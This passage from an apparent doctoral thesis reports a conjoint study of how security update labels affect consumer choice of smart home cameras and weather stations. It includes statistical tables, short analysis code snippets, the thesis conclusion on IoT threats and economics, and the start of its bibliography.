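    "Availability of security updates": {"none": -111.9, "2 years": 14.3, "6 years": 97.6},
    "Provisioning time": {"none": -32.8, "10 days": 37.2, "30 days": -4.3},
}

ranges = {attr: max(levels.values()) - min(levels.values()) for attr, levels in part_worths.items()}
total = sum(ranges.values())
for attr, rng in sorted(ranges.items(), key=lambda kv: -kv[1]):
    print(f"{attr}: {100 * rng / total:.1f}%")
```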

As listed in Table 7.6, the availability of security updates (31%) is the most important attribute for smart home cameras. It is twice as important as price (15%) and the provisioning time for security updates (14%). Other functional attributes are less important, with relative importances between 8% and 12%. For the smart weather station, the availability of security updates (20%) is also the most important attribute. However, the difference in importance to the other product attributes is smaller than for the smart home camera. The relative importances of price, the rain and wind sensor, and the provisioning time for security updates are each around 16%. All other attributes have relative importances between 7% and 13%.


Table 7.6: Relative importance of product attributes.

Smart Home Camera (n = 731)
Rank  Attribute              µ [%]   σ [%]
1.    Availability¹          30.57    9.82
2.    Price                  15.12    8.86
3.    Provisioning time²     13.98    6.30
4.    Resolution             12.05    8.98
5.    Frame rate             10.71    6.06
6.    Field of view           8.89    5.29
7.    Zoom function           8.68    6.72

Smart Weather Station (n = 735)
Rank  Attribute              µ [%]   σ [%]
1.    Availability¹          20.37    9.28
2.    Price                  16.64   11.03
3.    Rain/wind sensor       16.37    9.87
4.    Provisioning time²     16.12    7.96
5.    Expandability          13.15    8.14
6.    Battery lifetime        9.82    6.53
7.    Precision               7.53    4.84

¹ Availability of security updates, ² Provisioning time for security updates

In general, the relative importance of the attributes differs between the two product categories. Good research practice, e.g., [23], strongly discourages the quantitative comparison of preference measurements across different product categories, as the importance of an attribute can only be interpreted as a relative value within the particular product category. Therefore, we discuss the possible differences qualitatively. For the product with the high perceived security risk, especially the availability of security updates (twice as important as other attributes) seems to play a more crucial role in buying decisions than for the product with the low perceived security risk (only slightly more important than other attributes). Furthermore, the provisioning time for security updates is considered the third most important attribute for the product with the high perceived security risk and the fourth most important attribute for the product with the low perceived security risk. Thus, the provisioning time for security updates seems to have a similar importance to price and other highly ranked technical attributes.

To summarize, the availability of security updates plays the most important role in the consumers’ choice in this study. The relative importance of the provisioning time for security updates is also high, although substantially lower than that of the availability of security updates. For both product categories, the second most important attribute is the price. Functional features of both product categories are rated as less important than the attributes of the security update label and price, except the rain and wind sensor for smart weather stations.

Table 7.7 shows the average utilities that consumers ascribe to the levels of the product attributes [225]. Negative utilities represent unfavorable options compared to the other options, while positive utilities describe the favorable options. The utilities of all levels of a certain product attribute add up to zero. For the price attribute, lower prices have a higher utility for consumers. For both product categories, the non-availability of security updates is considered especially unfavorable, with the highest negative utility scores among all attributes. The availability of security updates for 6 years is more favorable than for 2 years. The utilities for the provisioning time for security updates show a preference for the short time period (10 days) over the longer time period (30 days).


Table 7.7: Average utilities of selected product attributes.

Attribute                            Level                      Smart Home   Smart Weather
                                                                Camera       Station
Price                                €100                          33.64        44.13
                                     €120                          19.46        21.08
                                     €140                          -5.66        -9.33
                                     €160                         -47.45       -55.88
Availability of security updates     none                        -111.93       -77.52
                                     until 12/2020 (2 years)       14.32        21.91
                                     until 12/2024 (6 years)       97.61        55.61
Provisioning time for sec. updates   none                         -32.82       -61.10
                                     within 10 days                37.16        43.75
                                     within 30 days                -4.34        17.35

Note: The utilities of all levels of a certain product attribute add up to zero.

A provisioning time of 30 days has a negative utility for the smart home camera, in contrast to the smart weather station. Thus, participants dislike long provisioning times for a product with a high perceived security risk.

7.6.6 Validity

We tested the internal consistency of our results by comparing simulations based on the preference measurement results with the choice data from the holdout tasks (cf. Section 7.6.1). Furthermore, we validated the preference for long availability periods and short provisioning times. The results of the holdout tasks were not included in the calculation of the preference measurement results.

For the holdout tasks, we defined five product profiles – P1, P2, P3a, P3b, P4 – for each product category. Profiles P3a and P3b differ only in their security update label attributes: In P3a, there was no guarantee for the availability and provisioning time of security updates. In P3b, these two attributes were set to the objectively best levels: availability of security updates for 6 years with a provisioning time of 10 days. In the course of the survey, each respondent performed 10 choice tasks, of which 8 were randomly generated and 2 were fixed holdout tasks. The fixed holdout tasks were the same for all respondents of a product category and appeared as the 4th and 8th of the 10 choice tasks. Each holdout task consisted of four of these product profiles, presented in a fixed order. In the first holdout task (i.e., the 4th choice task), the profiles (P1, P2, P3a, P4) were presented. In the second holdout task (i.e., the 8th choice task), the profiles (P4, P3b, P2, P1) were presented.


Table 7.8: Comparing the market estimation regarding shares of preference of four predefined product configurations with real preferences in the fixed holdout tasks.

Smart Home Camera
                 Holdout Task 1 (P1, P2, P3a, P4)    Holdout Task 2 (P4, P3b, P2, P1)
Product Profile  Estimated      Real                 Estimated      Real
P1               1.5%           2.7%                 1.4%           2.9%
P2               4.8%           11.4%                2.4%           5.7%
P3               3.6%           6.6%                 58.8%          53.4%
P4               84.4%          72.8%                34.6%          35.6%
None             5.7%           6.6%                 2.8%           2.5%

Smart Weather Station
                 Holdout Task 1 (P1, P2, P3a, P4)    Holdout Task 2 (P4, P3b, P2, P1)
Product Profile  Estimated      Real                 Estimated      Real
P1               1.7%           3.3%                 1.5%           2.7%
P2               22.1%          21.0%                15.8%          16.5%
P3               5.3%           9.5%                 36.5%          32.7%
P4               61.1%          57.1%                39.0%          42.0%
None             9.7%           9.1%                 7.1%           6.1%

P3a and P3b differ only in the security update label attributes: P3a does not guarantee security updates, whereas P3b guarantees availability of security updates until 2024 (6 years) and a provisioning time within 10 days.


The results in Table 7.8 (‘Real’ columns) for smart home cameras show that in the first holdout task 6.6% decided for P3a, without a guarantee for security updates, while in the second holdout task 53.4% chose P3b, with the best guarantee for security updates. The same effect can be observed for the smart weather station: in the first holdout task, 9.5% chose P3a, while 32.7% decided for P3b. This validates the results that we derived from the randomly generated choice tasks: The (non-)availability of security updates is an important factor in buying decisions, and this effect seems to be stronger for products with a high perceived security risk.

We tested the consistency of the hierarchical Bayes estimation with the market simulator from Lighthouse Studio, which represents a standard procedure to assess the internal validity of CBC models [218]. This market simulator estimates the shares of preferences for the product profiles P1 to P4 based on the preference measurement results of the conjoint analysis. We compared the estimated market shares with the evidence gathered through the holdout tasks (see Table 7.8). For example, in the first holdout task of the smart home camera, the market simulator estimated a market share of 84.4% for P4, while the evaluation of the real choices showed that 72.8% of the respondents decided for P4. Based on the comparison of estimated and real choices, we conclude that although the simulator does not exactly match the real choices, the preference measurement results are robust in estimating the order and magnitude of the overall preferences, which indicates a high consistency of the results.
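The idea behind such a market simulation can be sketched as follows: each respondent’s estimated total utility per profile is converted into choice probabilities and then averaged over respondents. The logit (softmax) rule used below is one common approach and is an assumption for illustration purposes; it is not necessarily the exact method implemented in Lighthouse Studio, and the utility matrix is random stand-in data.

```python
# Sketch: share-of-preference estimate from per-respondent profile utilities.
import numpy as np

rng = np.random.default_rng(42)
n_respondents, n_options = 5, 5                      # four profiles + "no choice"
utilities = rng.normal(0, 1, (n_respondents, n_options))   # stand-in HB utilities

def shares_of_preference(u):
    expu = np.exp(u - u.max(axis=1, keepdims=True))  # numerically stable softmax
    probs = expu / expu.sum(axis=1, keepdims=True)
    return probs.mean(axis=0)                        # average over respondents

print(shares_of_preference(utilities))
```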


Table 7.9: Consumer segmentation via latent-class analysis.

Smart Home Camera
                                           Group 1    Group 2    Group 1 vs Group 2
n (1)                                          488        243
Gender                  female               42.6%      44.9%    χ²(1) = 0.42, V = 0.024
                        male                 55.9%      53.1%
Age µ [years]                                 33.0       33.9    t(729) = −1.10, d = −0.09
Vocational              none                  9.2%      11.9%    χ²(2) = 3.35, V = 0.068
qualification           vocational           38.7%      42.8%
                        academic             52.0%      45.3%
Monthly net income (3) (µ [€])                1704       1706    t(599) = −0.22, d = 0.002
Professional IT         yes                  18.5%      17.7%    χ²(1) = 0.06, V = 0.01
background              no                   81.5%      82.3%
Privacy concerns                              4.48       4.59    t(729) = −0.98, d = −0.08
Security behavior intention                   3.59       3.56    t(729) = 0.59, d = 0.05
Perceived security risk                       5.44       5.61    t(729) = −2.13*, d = −0.17

Smart Weather Station
                                           Group 1    Group 2    Group 3    Group 1 vs Group 2 vs Group 3 (2)
n (1)                                          182        221        332
Gender                  female               43.4%      50.2%      40.1%    χ²(2) = 4.40, V = 0.08
                        male                 53.8%      49.8%      58.7%
Age µ [years]                                 36.9       34.8       32.8    F(2, 732) = 8.00**, r = 0.15
Vocational              none                  8.2%      11.8%      12.3%    χ²(4) = 68.31**, V = 0.22
qualification           vocational           37.9%      43.0%      37.7%
                        academic             53.8%      45.2%      50.0%
Monthly net income (3) (µ [€])                1854       1707       1532    F(2, 619) = 3.73*, r = 0.11
Professional IT         yes                  13.7%      17.2%      17.8%    χ²(2) = 0.37, V = 0.02
background              no                   81.3%      81.4%      80.4%
Privacy concerns                              4.54       4.57       4.26    F(2, 732) = 3.86*, r = 0.10
Security behavior intention                   3.70       3.67       3.47    F(2, 732) = 16.74**, r = 0.17
Perceived security risk                       3.88       3.96       3.32    F(2, 732) = 10.31**, r = 0.21

Notation: Statistically significant with *p < 0.05, **p < 0.01. (1) If missing values appear for specific variables, the respective analyses rely on a diverging number of cases. (2) Post-hoc tests are given in Table 7.11. (3) Income data were processed following the methodology of the German sample census [175].


Table 7.10: Product attribute importance of consumer groups.

Smart Home Camera
Rank  Group 1 (n = 488)              Group 2 (n = 243)
1.    Availability¹        31.42%    Availability¹        25.26%
2.    Resolution           16.47%    Provisioning time²   19.03%
3.    Price                11.82%    Price                16.66%
4.    Frame rate           10.68%    Field of view        11.64%
5.    Zoom function        10.48%    Frame rate            9.26%
6.    Provisioning time²   10.22%    Resolution            9.17%
7.    Field of view         8.91%    Zoom function         8.98%

Smart Weather Station
Rank  Group 1 (n = 182)              Group 2 (n = 221)              Group 3 (n = 332)
1.    Availability¹        23.41%    Availability¹        35.24%    Price                29.98%
2.    Rain/wind sensor     23.14%    Provisioning time²   24.62%    Rain/wind sensor     20.55%
3.    Provisioning time²   19.38%    Expandability        12.95%    Battery lifetime     13.46%
4.    Expandability        15.90%    Battery lifetime      8.12%    Expandability        12.88%
5.    Price                 8.49%    Rain/wind sensor      7.11%    Precision             8.49%
6.    Battery lifetime      5.26%    Precision             6.19%    Availability¹         8.01%
7.    Precision             4.44%    Price                 5.76%    Provisioning time²    6.64%

¹ Availability of security updates, ² Provisioning time for security updates

7.6.7 Segmentation

We used the latent class segmentation module of Lighthouse Studio to assign respondents to groups with similar preferences. The module implements latent class analysis, a classification technique for finding groups in multi-dimensional data. First, we needed a measure to decide into how many segments we should split the respondents. Following the recommendations of Sawtooth Software [260], we used the consistent Akaike information criterion [33] as this measure. Based on this criterion, we decided to split the respondents of the product categories “smart home camera” and “smart weather station” into two and three segments, respectively. The consumer segmentation for both product categories is shown in Table 7.9. The differences in preferences between the segments are given in Table 7.10.

For the smart home camera, the two segments differ statistically significantly only in the perceived security risk. For the first group, with a lower security risk perception towards smart home cameras, the availability of security updates (31%) is the most important product attribute and twice as important as resolution (16%) and price (12%). In comparison to the importance of the technical features other than resolution (9–11%), the availability of security updates is even three times more important.
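The consistent Akaike information criterion (CAIC) from [33] is usually written as CAIC = −2 ln L + q (ln N + 1), where L is the model likelihood, q the number of estimated parameters, and N the number of respondents; the solution with the lowest CAIC is preferred. The sketch below only illustrates this comparison; the log-likelihoods and parameter counts are invented, not values from the latent class estimation.

```python
# Sketch: comparing candidate segment counts with CAIC = -2 ln L + q (ln N + 1).
import math

N = 735                         # respondents for the smart weather station
candidates = {                  # segments -> (log-likelihood, parameter count), both invented
    2: (-6300.0, 2 * 17 + 1),
    3: (-6150.0, 3 * 17 + 2),
    4: (-6120.0, 4 * 17 + 3),
}

def caic(log_lik, q, n):
    return -2 * log_lik + q * (math.log(n) + 1)

for k, (ll, q) in candidates.items():
    print(f"{k} segments: CAIC = {caic(ll, q, N):.1f}")
```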


Table 7.11: Post-hoc tests (Tukey HSD) for segmentation.

Smart Weather Station
Variable                      Groups    MD¹       p      95%-CI²               d
Age                           1 vs 2     2.14     0.14   [−0.51, 4.80]         0.19
                              1 vs 3     4.12     0.00   [1.68, 6.57]          0.37
                              2 vs 3     1.98     0.11   [−0.32, 4.28]         0.17
Monthly net income            1 vs 2   146.95     0.50   [−158.63, 452.53]     0.11
                              1 vs 3   322.04     0.02   [37.85, 606.49]       0.26
                              2 vs 3   175.09     0.26   [−85.76, 435.94]      0.15
Privacy concerns              1 vs 2    −0.03     0.97   [−0.37, 0.31]         0.02
                              1 vs 3     0.28     0.09   [−0.03, 0.59]         0.20
                              2 vs 3     0.31     0.03   [0.02, 0.60]          0.22
Security behavior intentions  1 vs 2     0.03     0.89   [−0.12, 0.18]         0.06
                              1 vs 3     0.23     0.00   [0.09, 0.36]          0.39
                              2 vs 3     0.20     0.00   [0.07, 0.33]          0.47
Perceived security risk       1 vs 2    −0.08     0.84   [−0.41, 0.25]         0.05
                              1 vs 3     0.56     0.00   [0.25, 0.86]          0.36
                              2 vs 3     0.63     0.00   [0.35, 0.92]          0.31
Notation: ¹ mean difference, ² 95%-confidence interval

For the second group, with the higher security risk perception, the availability (25%) and provisioning time (19%) of security updates are the most important product attributes, followed by price (17%). Compared to the importance of the technical features (9–12%), availability and provisioning time are (almost) twice as important.

For the smart weather station, the segments differ statistically significantly with regard to age, vocational qualification, income, privacy concerns, security behavior intentions, and perceived security risk. The first group exhibits the highest average age, high vocational qualifications, the highest income, high privacy concerns, the highest security behavior intentions, as well as a high security risk perception towards smart weather stations. For this group, the availability of security updates (23%) as well as the rain and wind sensor (23%) are the most important product attributes, followed by provisioning time (20%) and expandability (16%). These attributes are 2 to 3 times as important as the price (8%).

The second group is characterized by lower vocational qualification, the highest privacy concerns, and the highest perceived security risk. For this group, the attributes of the security update label dominate the choice decision and account for 60% of the overall importance. The availability (35%) and provisioning time (25%) are three and two times as important, respectively, as the technical features. For this group, the price (6%) is the least important attribute in their choice.

The third group perceives the lowest risk for smart weather stations.

This group is the youngest on average, has the lowest income, as well as the lowest privacy concerns and security behavior intentions. The most important product attribute is the price (30%), followed by technical features such as the rain and wind sensor (21%) and battery lifetime (13%). The availability (8%) and provisioning time (7%) of security updates are the least important attributes, i.e., the security update label plays only a minor role in the consumers’ choice in this segment.
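The kind of pairwise comparison reported in Table 7.11 can be reproduced in principle with an off-the-shelf Tukey HSD implementation. The sketch below uses the group sizes from Table 7.9 but simulated per-respondent scores, so its output will not match the table values.

```python
# Sketch: Tukey HSD post-hoc comparison on simulated perceived-risk scores.
import numpy as np
from statsmodels.stats.multicomp import pairwise_tukeyhsd

rng = np.random.default_rng(7)
scores = np.concatenate([
    rng.normal(3.88, 1.5, 182),   # group 1 (stand-in data)
    rng.normal(3.96, 1.5, 221),   # group 2 (stand-in data)
    rng.normal(3.32, 1.5, 332),   # group 3 (stand-in data)
])
groups = np.repeat(["group 1", "group 2", "group 3"], [182, 221, 332])

print(pairwise_tukeyhsd(scores, groups, alpha=0.05))
```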

7.7 Discussion

We discuss the research questions formulated in Section 7.4 and consider the economic and policy implications of our results.

RQ1: Relative importance of the availability period and provisioning time. The availability of security updates was the product attribute with the highest relative importance (up to twice as important as other high-ranked attributes) as well as with the widest span of average utility (Table 7.6). The provisioning time for security updates was evaluated as less important than the availability, but seems to be more important than most technical features. Consumers also prefer short provisioning times, and even assign a negative utility (i.e., dislike) to the provisioning time of 30 days for the product with the high perceived security risk (Table 7.7). The high importance of the attributes of the security update label is surprising, as users are not familiar with these attributes. This might be due to the explicit mention of the non-availability of security updates, which might have deterred users. This effect can be seen in Table 7.7, where the negative utility of non-availability is greater (-111.93 for home cameras and -77.52 for weather stations) than the positive utility of the availability of security updates for 6 years (97.61 and 55.61, respectively). This indicates that consumers want to avoid the non-availability of security updates, and therefore, the mandatory nature of the security update label is very important.

RQ2: Differences between products with a low and high perceived security risk. We observed differences in the relative importance of the security update attributes. For the product with the high perceived security risk, the importance of availability is at least twice as high as the importance of other attributes. In contrast, for the product with a low perceived security risk, availability is only slightly more important than other high-ranked attributes. Furthermore, for the product with the high perceived security risk, the results of the holdout tasks (cf. Table 7.8, ‘Real’ columns) show an increase of preference from 6.6% for product profile P3a (without guaranteed security updates) to 53.4% for profile P3b (with a 6-year guarantee for security updates). For the product with the low perceived security risk, there is a comparatively smaller increase from 9.5% to 32.7% in the preference for the analogous product profiles. Also, if we sum up the importance of both label attributes, the security update label shows a relative importance of 45% for the consumers’ choice regarding the product with the high perceived security risk, compared to 36% for the product with the low perceived security risk.

This finding supports the concern of moral hazard (Section 7.3.4): Users might consider security update labels primarily if they think that they could be personally affected by security incidents. In reality, however, products with a seemingly low perceived security risk for the owner can be used for serious attacks. For example, Mirai utilized digital video recorders [12]. We conclude that the introduction of security update labels might need educational campaigns that explain the non-personal security risks associated with IoT devices.

RQ3: Differences due to demographic characteristics of the consumers. The sample segmentation for the product with the high perceived security risk did not show any differences in demographic factors (Table 7.9). For the product with the low perceived security risk, the segmentation showed statistically significant differences in terms of age, vocational qualification, and income. The groups with higher age and higher income assigned a higher importance to the security update label attributes (Table 7.10). This could indicate that these consumers may invest more in the sustainable security of their IoT devices. In contrast, the group with the youngest age and lowest income seems not to care much about security updates. We conclude that for products with a high perceived security risk, demographics may play a minor role, whereas for products with a lower perceived security risk, a younger population with lower income may prefer cheaper products with lower security.

RQ4: Differences due to security behavior intentions, privacy concerns, and security risk perception of the consumers. While the segmentation of the product category with the high perceived security risk showed only minor differences between the groups, the groups for the product category with the low perceived security risk range from very low to very high importance of the security update label. There, the respondents with higher security behavior intentions and privacy concerns exhibit a higher preference for the attributes of the security update label. For both product categories, a higher security risk perception is positively related to a higher importance of the security update label’s attributes. This indicates that consumers with a higher sensitivity for security risks and privacy concerns may assign a higher importance to security update labels.

Limitations and Future Work. The results of the user study have the usual limitations of conjoint analysis studies. For the comparison of products, we had to limit the number of product attributes and discretize attribute levels. Also, some product attributes, such as product design, were discarded due to the impracticality of specifying attribute levels. Although we specified product attributes and attribute levels based on best practices and empirical evidence, a product profile cannot fully represent all factors that may influence buying decisions, such as product presentation, packaging, advertisement campaigns, and consumer ratings. Usability aspects of update mechanisms might also influence the consumers’ choice. Another limitation is the evaluation of stated preferences (i.e., hypothetical buying decisions). However, the assessment of real buying decisions was infeasible, as there are no suitable products that guarantee security updates. Finally, as we ran the user study with German respondents, the results might not be valid for other markets.

Thus, future work is required to investigate the impact of security update labels in other countries, and with different sets of participants, products, and attributes. As we focused on the consumers’ choice in this work, future work should also consider the positions of manufacturers and policy makers.

Economic Implications. Security update guarantees may create additional costs for manufacturers that will potentially be passed on to consumers [44]. Are consumers willing to bear these costs? CBC analyses are not appropriate for precisely estimating consumers’ willingness to pay for a certain attribute. However, attribute levels with a high importance for consumers’ choices also indicate a willingness to pay a higher price for products with this attribute level [203]. In addition, initial support for the willingness to pay a price premium is provided by studies showing that consumers perceive price increases as fair if they are caused by higher costs for the manufacturer [148, 29, 160]. Prior works [74, 243] also concluded that consumers accept additional costs for security depending on the product’s perceived security risk.

Policy Implications. Our results show that mandatory security update labels could indeed have a high influence on consumers’ choices. The labels communicate attributes that enable non-experts to intuitively compare the security properties of different IoT products during the purchase process, and thereby influence buying decisions. The introduction of security update labels might increase the security of IoT consumer products by establishing economic incentives for manufacturers to guarantee a long and timely availability of security updates or, from another perspective, by creating competitive disadvantages for the non-availability of security updates. These labels could strengthen the state of IoT security in the long term, as unpatched IoT consumer products are a major reason behind today’s IoT security incidents.

7.8 Conclusion

Security update labels benefit consumers, as they decrease the probability of falling victim to disclosed but unpatched vulnerabilities. They have the potential to motivate manufacturers to invest more resources in the provision of security updates, which might lead to positive security-related changes in their business strategies. Finally, national security will also profit from these labels, as they strengthen the security of private IoT infrastructure and therefore reduce the attack surface for malicious domestic and foreign actors.

Chapter 8

Conclusion and Future Work

In the last twenty years, the Internet has extended from digital spheres into the physical world. New applications emerged that brought many advancements to private, public, and industrial spaces and their users. However, this technological revolution of the IoT also introduced new threat vectors. In the first part of this thesis, we investigated the landscape of IoT threats from a technical perspective. The proposed threat taxonomy classified threats into three categories: the threat of information leakage, the threat of connectivity misuse, and the threat of object exploitation.

The first category, the threat of information leakage, is based on the assumption that attackers have access to data collected by IoT objects and applications. By analyzing the collected data, the attacker can gain valuable information about the state, environment, and users of a specific IoT system. In a case study, we showed that attackers are able to interfere with the users’ privacy by analyzing room climate data collected by smart heating applications. In future work, the following research questions could be addressed: How would the fusion of different types of typical smart home sensors improve the detection of activities? To what extent can IoT-generated data be used for the reconstruction of events in criminal investigations? What techniques can be applied to data collection from sensitive IoT applications to minimize privacy implications?

The second category, the threat of connectivity misuse, allows attackers to abuse the inter-connectability of IoT objects as well as the IoT infrastructure. In a case study, we demonstrated the threat of malicious hardware elements that communicate with the attacker over a public IoT infrastructure. Future work might investigate research questions such as: To what extent can the physical appearance of malicious IoT implants realistically be minimized? What further detection mechanisms can be developed to protect against malicious IoT hardware elements? How can public IoT infrastructures be protected against misuse?

Finally, in the third category, the threat of object exploitation, IoT objects and applications are misused to tamper with the physical world. In a case study, we revealed and examined a number of insecurities in the commissioning of the ZigBee smart home network standard. Exploiting the weak security of this standard, attackers are able to take over IoT objects within wireless range, ranging from non-critical light bulbs to security-critical door locks. As the IoT highly relies on standardized communication technologies, the analysis of further network protocols is required as future work. Especially wireless low-power standards will play an important role within the IoT and future 5G networking. Potential research questions include: How does the reduced protocol complexity in low-power standards affect the security design?

What techniques exist to securely join factory-new IoT objects to existing networks without requiring pre-shared key material?

In the second part of this thesis, we examined the security of IoT consumer products from an economic perspective. In particular, we performed a root cause analysis of the security vulnerabilities of the ZigBee standard and concluded that the insufficient security design resulted at least partly from missing economic incentives. To incentivize manufacturers to develop comprehensive and sustainable security architectures, we proposed security update labels and examined their impact on the consumers’ choice. These labels transform the asymmetric information about the manufacturers’ willingness to provide future security updates into an assessable and comparable feature. The results of the user study show that these labels indeed influence consumers’ buying decisions in favor of manufacturers that guarantee security updates for a long time. Thus, they have the potential to create economic incentives for manufacturers to put more effort into providing sustainable security support for their products.

IoT security and privacy economics are a promising and largely unexplored research direction. Currently, the understanding of how economic principles can be leveraged to increase the security and privacy of IoT systems and applications is limited. However, the development and release of IoT products is largely influenced by financial motivations, which affects not only the consumer but also the business segment. Interesting research questions might be: What is the willingness to pay a price premium for secure IoT objects? Do user preferences regarding the security of IoT objects differ between cultural backgrounds? How can economic approaches be leveraged to improve the privacy of sensitive IoT applications? Answering such questions could enable policymakers to establish incentives for higher and more sustainable levels of security and privacy in future IoT products.

Bibliography

[1] M. Abomhara and G. M. Køien, “Cyber security and the Internet of Things: Vulnerabilities, threats, intruders and attacks,” Journal of Cyber Security, vol. 4, no. 1, pp. 65–88, January 2015. [Online]. Available: https://doi.org/10.13052/jcsm2245-1439.414

[2] A. Acquisti, A. Friedman, and R. Telang, “Is there a cost to privacy breaches? An event study,” in Proceedings of the International Conference on Information Systems, ICIS 2006, Milwaukee, Wisconsin, USA, December 10-13, 2006. Association for Information Systems, 2006, p. 94. [Online]. Available: http://aisel.aisnet.org/icis2006/94

[3] F. Adelantado, X. Vilajosana, P. Tuset-Peiró, B. Martínez, J. Melià-Seguí, and T. Watteyne, “Understanding the limits of LoRaWAN,” IEEE Communications Magazine, vol. 55, no. 9, 2017. [Online]. Available: https://doi.org/10.1109/MCOM.2017.1600613

[4] D. Agrawal, S. Baktir, D. Karakoyunlu, P. Rohatgi, and B. Sunar, “Trojan detection using IC fingerprinting,” in 2007 IEEE Symposium on Security and Privacy (S&P 2007), 20-23 May 2007, Oakland, California, USA. IEEE Computer Society, 2007, pp. 296–310. [Online]. Available: https://doi.org/10.1109/SP.2007.36

[5] B. Ai, Z. Fan, and R. X. Gao, “Occupancy estimation for smart buildings by an auto-regressive hidden Markov model,” in American Control Conference, ACC 2014, Portland, OR, USA, June 4-6, 2014. IEEE, 2014, pp. 2234–2239. [Online]. Available: http://dx.doi.org/10.1109/ACC.2014.6859372

[6] G. A. Akerlof, “The market for ”lemons”: Quality uncertainty and the market mechanism,” The Quarterly Journal of Economics, vol. 84, no. 3, pp. 488–500, 1970. [Online]. Available: http://www.jstor.org/stable/1879431

[7] O. H. Alhazmi, Y. K. Malaiya, and I. Ray, “Measuring, analyzing and predicting security vulnerabilities in software systems,” Computers & Security, vol. 26, no. 3, pp. 219–228, 2007. [Online]. Available: https://doi.org/10.1016/j.cose.2006.10.002

[8] M. I. Alpert, “Identification of determinant attributes: A comparison of methods,” Journal of Marketing Research, vol. 8, no. 2, pp. 184–191, 1971. [Online]. Available: http://www.jstor.org/stable/3149759

[9] R. Anderson, “Why information security is hard - An economic perspective,” in 17th Annual Computer Security Applications Conference (ACSAC 2001), 11-14 December 2001, New Orleans, Louisiana, USA. IEEE Computer Society, 2001, pp. 358–365. [Online]. Available: http://dx.doi.org/10.1109/ACSAC.2001.991552

[10] R. Anderson and S. Fuloria, “On the security economics of electricity metering,” in 9th Annual Workshop on the Economics of Information Security, WEIS 2010, Harvard University, Cambridge, MA, USA, June 7-8, 2010, 2010. [Online]. Available: http://weis2010.econinfosec.org/papers/session5/weis2010_anderson_r.pdf



[11] R. Anderson and T. Moore, “The economics of information security,” Science, vol. 314, no. 5799, pp. 610–613, 2006. [Online]. Available: http://science.sciencemag.org/content/314/5799/610.full.pdf

[12] M. Antonakakis, T. April, M. Bailey, M. Bernhard, E. Bursztein, J. Cochran, Z. Durumeric, J. A. Halderman, L. Invernizzi, M. Kallitsis, D. Kumar, C. Lever, Z. Ma, J. Mason, D. Menscher, C. Seaman, N. Sullivan, K. Thomas, and Y. Zhou, “Understanding the Mirai botnet,” in 26th USENIX Security Symposium, USENIX Security 2017, Vancouver, BC, Canada, E. Kirda and T. Ristenpart, Eds. USENIX Association, 2017, pp. 1093–1110. [Online]. Available: https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/antonakakis

[13] J. Appelbaum, J. Horchert, and C. Stöcker, “Shopping for spy gear: Catalog advertises NSA toolbox,” Spiegel Online International, vol. 29, 2013. [Online]. Available: http://www.spiegel.de/international/world/catalog-reveals-nsa-has-back-doors-for-numerous-devices-a-940994.html

[14] F. Armknecht, Z. Benenson, P. Morgner, and C. Müller, “On the security of the ZigBee light link touchlink commissioning procedure,” in International Workshop on Security, Privacy and Reliability of Smart Buildings, 2016, pp. 229–240. [Online]. Available: https://dl.gi.de/20.500.12116/874

[15] F. Armknecht, Z. Benenson, P. Morgner, C. Müller, and C. Riess, “Privacy implications of room climate data,” Journal of Computer Security, vol. 27, no. 1, pp. 113–136, 2019. [Online]. Available: https://content.iospress.com/articles/journal-of-computer-security/jcs181133

[16] K. Ashton, “That ‘Internet of Things’ thing,” RFiD Journal, vol. 22, no. 7, pp. 97–114, 2009. [Online]. Available: https://www.rfidjournal.com/articles/view?4986

[17] D. Astely, E. Dahlman, A. Furuskär, Y. Jading, M. Lindström, and S. Parkvall, “LTE: The evolution of mobile broadband,” IEEE Communications Magazine, vol. 47, no. 4, pp. 44–51, 2009. [Online]. Available: https://doi.org/10.1109/MCOM.2009.4907406

[18] A. Avizienis, J. Laprie, B. Randell, and C. E. Landwehr, “Basic concepts and taxonomy of dependable and secure computing,” IEEE Trans. Dependable Sec. Comput., vol. 1, no. 1, pp. 11–33, 2004. [Online]. Available: https://doi.org/10.1109/TDSC.2004.2

[19] Y. Bachy, F. Basse, V. Nicomette, E. Alata, M. Kaâniche, J. Courrège, and P. Lukjanenko, “Smart-TV security analysis: Practical experiments,” in 45th Annual IEEE/IFIP International Conference on Dependable Systems and Networks, DSN 2015, Rio de Janeiro, Brazil, June 22-25, 2015. IEEE Computer Society, 2015, pp. 497–504. [Online]. Available: https://doi.org/10.1109/DSN.2015.41


[20] Z. Bakhshi, A. Balador, and J. Mustafa, “Industrial IoT security threats and concerns by considering Cisco and Microsoft IoT reference models,” in 2018 IEEE Wireless Communications and Networking Conference Workshops, WCNC 2018 Workshops, Barcelona, Spain, April 15-18, 2018. IEEE, 2018, pp. 173–178. [Online]. Available: https://doi.org/10.1109/WCNCW.2018.8368997

[21] S. Barge and H. Gehlbach, “Using the theory of satisficing to evaluate the quality of survey data,” Research in Higher Education, vol. 53, no. 2, pp. 182–200, March 2012. [Online]. Available: https://doi.org/10.1007/s11162-011-9251-2

[22] I. Bastys, M. Balliu, and A. Sabelfeld, “If this then what?: Controlling flows in IoT apps,” in Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, CCS 2018, Toronto, ON, Canada, October 15-19, 2018, D. Lie, M. Mannan, M. Backes, and X. Wang, Eds. ACM, 2018, pp. 1102–1119. [Online]. Available: https://doi.org/10.1145/3243734.3243841

[23] B. Baumgartner and W. J. Steiner, “Are consumers heterogeneous in their preferences for odd and even prices? Findings from a choice-based conjoint study,” International Journal of Research in Marketing, vol. 24, no. 4, pp. 312–323, 2007. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0167811607000456

[24] G. T. Becker, F. Regazzoni, C. Paar, and W. P. Burleson, “Stealthy dopant-level hardware trojans,” in Cryptographic Hardware and Embedded Systems - CHES 2013 - 15th International Workshop, Santa Barbara, CA, USA, August 20-23, 2013. Proceedings, ser. Lecture Notes in Computer Science, G. Bertoni and J. Coron, Eds., vol. 8086. Springer, 2013, pp. 197–214. [Online]. Available: https://doi.org/10.1007/978-3-642-40349-1_12

[25] K. Blind and A. Mangelsdorf, “Motives to standardize: Empirical evidence from Germany,” Technovation, vol. 48–49, pp. 13–24, 2016. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S016649721600002X

[26] B. Bloessl, C. Leitner, F. Dressler, and C. Sommer, “A GNU radio-based IEEE 802.15.4 testbed,” 12. GI/ITG Fachgespräch Sensornetze, pp. 37–40, September 2013. [Online]. Available: https://opus4.kobv.de/opus4-btu/frontdoor/deliver/index/docId/2805/file/CSR_03_13.pdf

